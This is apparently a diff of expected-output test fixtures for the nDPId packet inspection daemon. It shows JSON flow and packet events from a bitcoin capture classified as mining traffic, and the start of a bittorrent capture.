00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699728,"pkt":"ACPrIpS0ACNshovhCABFAACdK9RAAEAGd8TAqAGOw9oQsthoII1BDXcu4yOzE4AY\/\/9L7wAAAQEICicy+R8AACIN+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAA7s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/w9oQsiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII38Ree1v7hQ3gC4wAEA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1301328699856,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699856,"pkt":"ACNshovhACPrIpS0CABFAACdBc9AAHUGaMnD2hCywKgBjiCN2GjjI7MTQQ13l4AYAQQ8gQAAAQEICgAAIhwnMvkf+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAAA4s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthoAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/D2hCyII0FGo5IhpYwXgAKwwEA"}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1301328699969,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328699969,"pkt":"ACNshovhACPrIpS0CABFAABIBdlAAHUGaRTD2hCywKgBjiCN2GjjI7N8QQ13l4AYAQRZWQAAAQEICgAAIignMvkg+b602XZlcmFjawAAAAAAAAAAAAA="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1301328699728,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699728,"pkt":"ACPrIpS0ACNshovhCABFAACdK9RAAEAGd8TAqAGOw9oQsthoII1BDXcu4yOzE4AY\/\/9L7wAAAQEICicy+R8AACIN+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAAA7s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/w9oQsiCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII38Ree1v7hQ3gC4wAEA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":348,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301328699728,"flow_last_seen":1301328699728,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301328699728,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1301328699856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301328699856,"pkt":"ACNshovhACPrIpS0CABFAACdBc9AAHUGaMnD2hCywKgBjiCN2GjjI7MTQQ13l4AYAQQ8gQAAAQEICgAAIhwnMvkf+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAAA4s5BNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHthoAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/D2hCyII0FGo5IhpYwXgAKwwEA"}
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1301328699969,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1301328699969,"pkt":"ACNshovhACPrIpS0CABFAABIBdlAAHUGaRTD2hCywKgBjiCN2GjjI7N8QQ13l4AYAQRZWQAAAQEICgAAIignMvkg+b602XZlcmFjawAAAAAAAAAAAAA="}
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":495,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":495,"packets-processed":494,"total-skipped-flows":0,"total-l4-data-len":520135,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":5,"total-detection-updates":0,"total-updates":0,"current-active-flows":5,"total-active-flows":5,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1301329138452}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304767,"pkt":"ACPrIpS0ACNshovhCABFAACdDAhAAEAGDmvAqAGOuDqld9i\/II0stRatNDMFDIAY\/\/9S8AAAAQEICiczELoAVdzf+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAACYtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/uDqldyCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII0b7ZMAlkQ1dwALwwEA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7440000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1301329304813,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304813,"pkt":"ACNshovhACPrIpS0CABFAACdBMxAAHQG4aa4OqV3wKgBjiCN2L80MwUMLLUWrYAYAQTgGAAAAQEICgBV3OcnMxC6+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAACQtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHti\/AQAAAAAAAAAAAAAAAAAAAAAA\/\/+4OqV3II2BHa1kLxLeCgCuwgEA"}
00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1301329305005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1301329305005,"pkt":"ACPrIpS0ACNshovhCABFAACX6RJAAEAGMWbAqAGOuDqld9i\/II0stRcWNDMFdYAY\/\/+hogAAAQEICiczEL0AVdz7+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZYWRkcgAAAAAAAAAAHwAAAKr+QCYBbLWQTQEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHiCN"}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00616{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1301329304767,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304767,"pkt":"ACPrIpS0ACNshovhCABFAACdDAhAAEAGDmvAqAGOuDqld9i\/II0stRatNDMFDIAY\/\/9S8AAAAQEICiczELoAVdzf+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAACYtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/uDqldyCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/8mYIQeII0b7ZMAlkQ1dwALwwEA"}
00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301329304767,"flow_last_seen":1301329304767,"flow_idle_time":7560000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301329304767,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1301329304813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301329304813,"pkt":"ACNshovhACPrIpS0CABFAACdBMxAAHQG4aa4OqV3wKgBjiCN2L80MwUMLLUWrYAYAQTgGAAAAQEICgBV3OcnMxC6+b602XZlcnNpb24AAAAAAFUAAAACfQAAAQAAAAAAAACQtZBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHti\/AQAAAAAAAAAAAAAAAAAAAAAA\/\/+4OqV3II2BHa1kLxLeCgCuwgEA"}
00606{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1301329305005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":165,"pkt_l4_len":131,"thread_ts_msec":1301329305005,"pkt":"ACPrIpS0ACNshovhCABFAACX6RJAAEAGMWbAqAGOuDqld9i\/II0stRcWNDMFdYAY\/\/+hogAAAQEICiczEL0AVdz7+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZYWRkcgAAAAAAAAAAHwAAAKr+QCYBbLWQTQEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHiCN"}
00556{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":622,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":622,"packets-processed":621,"total-skipped-flows":0,"total-l4-data-len":537564,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":6,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1301329743430}
00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7440000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":172,"flow_first_seen":1301328319392,"flow_last_seen":1301329810648,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":152141,"flow_avg_l4_payload_len":884,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"74.89.181.229","src_port":55348,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00806{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":119,"flow_first_seen":1301328699728,"flow_last_seen":1301329807659,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":74897,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"195.218.16.178","src_port":55400,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00803{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1301329304767,"flow_last_seen":1301329810839,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1061,"flow_tot_l4_payload_len":2684,"flow_avg_l4_payload_len":99,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"184.58.165.119","src_port":55487,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00804{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":161,"flow_first_seen":1301328472925,"flow_last_seen":1301329809936,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":104984,"flow_avg_l4_payload_len":652,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"66.68.83.22","src_port":55383,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1301327937725,"flow_last_seen":1301327939000,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22190,"flow_avg_l4_payload_len":1167,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00807{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":139,"flow_first_seen":1301328089970,"flow_last_seen":1301328420526,"flow_idle_time":7560000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":182136,"flow_avg_l4_payload_len":1310,"midstream":1,"thread_ts_msec":1301329810839,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"69.118.54.122","src_port":55328,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}}
00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":637,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":637,"packets-processed":637,"total-skipped-flows":0,"total-l4-data-len":539032,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":42,"global_ts_msec":1301329810839}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 637/637

262
test/results/bittorrent.pcap.out
View File

@@ -1,136 +1,136 @@
00461{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"bittorrent.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1455469967246}
00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1455469967246,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"flow_min_l4_payload_len":68,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":68,"flow_avg_l4_payload_len":68,"midstream":1,"thread_ts_msec":1455469967246,"l3_proto":"ip4","src_ip":"192.168.1.3","dst_ip":"82.58.216.115","src_port":52888,"dst_port":38305,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00565{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bittorrent.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1455469967246,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":1455469967246,"pkt":"LFbcjDU0xCwDBkn+CABFAAB4eD1AAEAGAADAqAEDUjrYc86YlaHFzANOp3OTAoAY\/\/\/swwAAAQEIChnb8BkAhEMxE0JpdFRvcnJlbnQgcHJvdG9jb2wAAAAAABAABdz83M+55nDMw91Ax4wWHyvqJDEmLVVNMTg2MC1BjhgayboXmHFSZj4="}
